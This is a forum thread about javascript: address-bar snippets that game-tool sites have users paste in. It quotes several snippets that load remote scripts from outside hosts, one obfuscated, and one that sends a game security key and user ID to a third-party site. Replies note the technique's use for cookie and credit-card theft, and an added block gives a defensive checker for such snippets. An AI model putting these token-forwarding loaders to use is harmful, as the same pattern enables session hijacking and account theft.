
Can you guys point me in the right direction to where I could learn how to write a copy paste script?

 

similar to this

 

http://mobstereffect.com/propertycalcfb


javascript: alert("The Mobsters Game should now take up the entire window.\n\t\t When window loads Follow Step4"); location.href="http://mobsters-fb-apache-dynamic-lb.playdom.com/prod_facebook/facebook/mobsters_v1/facebook_iframe.php?action=tab&target=3";

javascript: var a=SECURITY_KEY; var b=USER_ID; if(confirm("Success!!\nClick OK to sync your account with MobsterEffect.com")){ location.href="http://www.mobstereffect.com/syncfb.php?next=propertycalcfb&fid="+b+"&fkey="+a; }

javascript:function%20b(){a=document.createElement('script');a.src='http://mobstereffect.com/calc.js.php?next=propertycalc&';document.getElementsByTagName('body')[0].appendChild(a);}b();

 

also on

 

 

http://www.sumob.com/?i=iPlayCalculator

 


javascript:a=function(t,f,i,x,e,d){p=new Array();for(u=0;u<x.length;u+=2)p[t[u/2]]=x.substr(u,2);for(u=0;u<x.length/2;u++){q=p[u];if(p[u]+p[u+1]=='5c79'){q='5c'+i+f+d+'6e';u++;}if(p[u]+p[u+1]=='5c7a'){q='20';u++;}if(p[u]+p[u+1]=='5c78'){q='09';u++;}e+=i+f+d+q;}z=setInterval('y=setInterval(\''+e+';clearInterval(y);'+'\');clearInterval(z)')}('85/71/27/109/69/24/106/56/35/73/57/82/47/75/54/15/46/108/16/30/96/80/25/51/12/63/4/104/83/89/74/7/107/50/88/26/45/100/17/29/102/87/3/99/23/11/67/20/94/28/98/18/111/78/91/60/70/53/33/58/101/31/22/43/32/39/6/38/90/81/37/66/76/55/13/8/34/44/5/77/10/19/97/68/42/95/72/103/86/59/105/52/84/61/92/48/62/2/9/65/110/41/64/1/36/40/79/0/49/21/93/14/'.split('/'),'u','\\','2f2f6c6d70436e297273292f286d7464746f79613f6f68722e6363724a6f7565646354696e612e28684d6f4d646474706a642b61292e6c2e3a702e3b743d6e6d64656d746f6d61686f27626e636575623b70277465732f2e416161695373732772647427286c3d3d6545636473652e6f','','00')

javascript:function b(){d=document;d.body.appendChild(a=d.createElement('script'));a.src='http://sumob.com/JS/AMToolsO.js?'+Math.random()}b();

 

He encoded that,

 

and this

 

http://go4uteam.com/propcalc

 


javascript:function b(){a=document.createElement('script');a.src='http://go4uteam.com/js/calc.js?';document.getElementsByTagName('body')[0].appendChild(a);}b();

 

What these copy paste scripts do is: you open up the certain MySpace application, put the code in the toolbar and hit enter, and it finds the tokens for the application and connects to their tools that they have on their site. Where could I go to learn how to write these copy paste scripts to do the same thing and connect to my site to use my tools?

 

Thanks! :)

 

https://forums.phpfreaks.com/topic/239182-javascript-copy-paste-script/

What you're referring to as "copy paste scripts" is not really that, it's regular old JavaScript, which is getting injected into the page, called "JavaScript Injection", or simply "JSI"..

 

This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing..

 

Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like Chrome automatically filling in credit card information on focus and selection of a credit-card related field..

 

 

but to get back on point about your question, can you make this? Sure, if you know anything about javascript..

 

The only real rule you need to remember about javascript injection.. Is.

 

Rule: If anything you put in the url, returns any data to the "JavaScript:" portion of the url, it will then try and redirect you to that page.. An example of BAD JSI

 

E.X.: javascript:(Math.random()*11);

 

that will send you to a page: "10" which will most likely be a blank page.. or page not found

 

GOOD JSI (lol, how ironic is that phrase)

 

E.X.: javascript:void(x = 11, y = Math.random() * x, alert("Random * "+x+" = "+y));

 

void() will always return nothing..
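
Added example, not part of the original posts: a static check a defender can run on a pasted javascript: URL before it goes anywhere near the address bar, flagging the remote-script loader shape used by the snippets in this thread. The function name, the finding labels and the tools.example / game.example hosts are assumptions made for the illustration.

```javascript
// Added example: static triage of a pasted "javascript:" URL. Nothing is executed.
// triageJavascriptUrl and the finding labels are this example's own names.
function triageJavascriptUrl(pasted, pageHost) {
  const scheme = /^\s*javascript:/i.exec(pasted);
  if (!scheme) return null; // not a javascript: URL at all
  let body = pasted.slice(scheme[0].length);
  try {
    body = decodeURIComponent(body); // browsers percent-decode the body before running it
  } catch (e) {
    // malformed escapes: analyse the raw text instead
  }

  // Every absolute URL in the snippet, reduced to hosts other than the current page's.
  const hosts = new Set();
  for (const u of body.match(/https?:\/\/[^\s'"\\)]+/gi) || []) {
    try {
      const h = new URL(u).hostname.toLowerCase();
      if (h !== pageHost && !h.endsWith('.' + pageHost)) hosts.add(h);
    } catch (e) { /* unparsable URL text, ignore */ }
  }

  const findings = [];
  // Loader shape seen in this thread: a <script> element whose src points off-site.
  if (/createElement\(\s*['"]script['"]\s*\)/i.test(body) && hosts.size > 0)
    findings.push('remote-script');
  // Code built from strings hides what will run (eval, string timers, Function constructor).
  if (/\beval\s*\(|\bset(?:Interval|Timeout)\s*\(\s*['"]|\bnew\s+Function\s*\(/.test(body))
    findings.push('string-eval');
  if (/document\.cookie/.test(body)) findings.push('reads-cookie');
  if (/location(?:\.href)?\s*=[^=]/.test(body) && hosts.size > 0)
    findings.push('navigates-off-site');
  return { offSiteHosts: [...hosts].sort(), findings };
}

// Constructed samples (hosts are placeholders, not taken from the thread).
const SAMPLES = {
  loader: "javascript:function%20b(){a=document.createElement('script');" +
          "a.src='http://tools.example/calc.js?';document.body.appendChild(a);}b();",
  harmless: 'javascript:void(alert(document.title))',
  timer: "javascript:setTimeout('alert(document.cookie)',0)",
};
for (const [name, url] of Object.entries(SAMPLES))
  console.log(name, JSON.stringify(triageJavascriptUrl(url, 'game.example')));
```

A 'remote-script' finding means the pasted line is only a stub: the code that actually runs lives on the listed host and can change after the line has been reviewed.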

  • 2 months later...

This is technically a form of maliciousness, but it can only affect whatever is on the page at this moment, it can, however, trick the browser into referring the user to another page which requires referrers to match up, that amongst other things like ad blocking, AJAX Referrer spoofing..

 

Using somebody else's JSI could lead to: stealing sensitive information from cookies and password forms, snooping on the content of the page, credit card theft, amongst other things, especially with browsers like Chrome automatically filling in credit card information on focus and selection of a credit-card related field..

 

 

On that note... There is also security in using JSI, for sites like mine, who help users by making tools for their game, it allows me to access their game security tokens and myspace ID, without directly asking for and using (and possibly storing) their myspace login. This allows for many useful things, such as calculating what it will take for a user to achieve a certain income within their game.

 

I do agree with you that there are many malicious sites and developers who use this for their benefit. On another note, if web browsers and developers were smart, they would store credit card numbers in a password field, and have a verify field, just like most sites do for a password. This way, when it is autofilled, even if someone tries to use JSI to take the CCN, it would just be a bunch of asterisks.

 

Another couple of options for JSI besides using the void() function are eval(), which .. triggers some virus programs, and just creating a blank function and running it... such as function b(){content to be run}b();

And last but not least, setInterval() and setTimeout() work as well.

  • 1 month later...

Sorry for replying so late, been really busy lately.. I'd like to point out that JSI on a password field does yield the correct information, not asterisks, unless I read you wrong.

 

Again sorry late reply lol. *feels like a post necromancer*
